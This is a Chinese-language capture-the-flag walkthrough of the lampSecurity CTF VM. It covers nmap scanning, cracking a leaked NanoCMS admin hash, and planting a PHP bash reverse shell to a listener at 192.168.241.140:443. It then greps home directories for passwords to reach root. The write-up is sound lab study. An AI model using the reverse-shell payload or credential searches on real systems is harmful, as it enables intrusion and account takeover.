lampSecurityCTF4
信息收集
主机信息收集
主机ip
nmap -sn 192.168.241.0/24
主机开放端口
root@kali:/root/baji_100/CTF5# nmap --min-rate 10000 -p- 192.168.241.153
主机开放端口详细信息
nmap -sT -sV -O -p22,25,80,110,139,143,445,901,3306,55439 192.168.241.153
主机漏洞探测
nmap --script=vuln -p22,25,80,110,111,129,143,445,901,3306,55439 192.168.241.153
总结,通过nmap 扫描主机咯东发现有几个路径存在sql 注入、和枚举
剩余没什么有用信息。 之后在测试
web 信息收集
访问80端口
通过浏览发现blog 使用的nanocms
通过搜索searchsploit ,存在远程代码执行,但是需要登录,我们目前没有账号密码
通过互联网搜索,发信有个密码hash 信息泄露的路径
访问该路径,果然存在,账号admin 密码 hash
在线解密 hash,密码为:shannon
使用账号密码登录后台成功,发现页面中可写,尝试写入反弹shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.241.140/443 0>&1'"); ?>
获取系统初始shell
通过监听443 获取系统初始shell
(1)查看当前账号有哪些超级权限,发现需要密码 ,尝试shannon 失败
(2)查看计划任务,没有有效的信息
(3)查看/etc/passwd, 及shadow ,发现pass好几个用户, shadow 无权限
(4)搜索pass 关键字信息
多账号下 搜索是否存在账号密码信息
grep -R -i pass /home/* 2>/dev/null |grep -v jquery
查看该文件, 密码50$cent
提权
切换root登录 ,登录成功